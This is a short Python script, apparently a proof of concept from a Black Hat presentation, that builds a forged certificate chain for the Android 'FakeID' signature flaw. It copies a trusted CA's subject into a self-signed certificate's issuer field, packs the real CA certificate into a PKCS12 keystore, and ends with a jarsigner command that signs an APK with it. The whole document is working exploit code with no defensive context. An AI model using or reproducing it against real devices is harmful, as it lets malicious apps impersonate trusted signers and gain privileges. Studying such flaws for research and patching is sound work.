fakeid CA script from BH presentation

Python

import OpenSSL
from OpenSSL.crypto import *
#assume you've already generated client.cer

#extract CERT.RSA
#openssl pkcs7 -in CERT.RSA -print_certs -inform DER -out cert.cer : CA cert isolated from RSA

cacert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, open('cert.cer','r').read())
pk = OpenSSL.crypto.PKey()
pk.generate_key(OpenSSL.crypto.TYPE_RSA,1024)
#client.cer 
oricert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, open('client.cer','r').read())
oricert.set_issuer(cacert.get_subject())
oricert.set_pubkey(pk)
oricert.sign(pk, "sha1")

pkcs12 = OpenSSL.crypto.PKCS12()
pkcs12.set_privatekey(pk)
pkcs12.set_certificate(oricert)
pkcs12.set_ca_certificates([cacert])

finalPkcs12Data = pkcs12.export(passphrase='1234')
pp = load_pkcs12(finalPkcs12Data, '1234')#verify keystore

#store keystore
print >> open('out.p12','wb'), finalPkcs12Data
#jarsigner -keystore out.p12 -storetype pkcs12 -sigalg SHA1withRSA -digestalg SHA1 app-debug.apk 1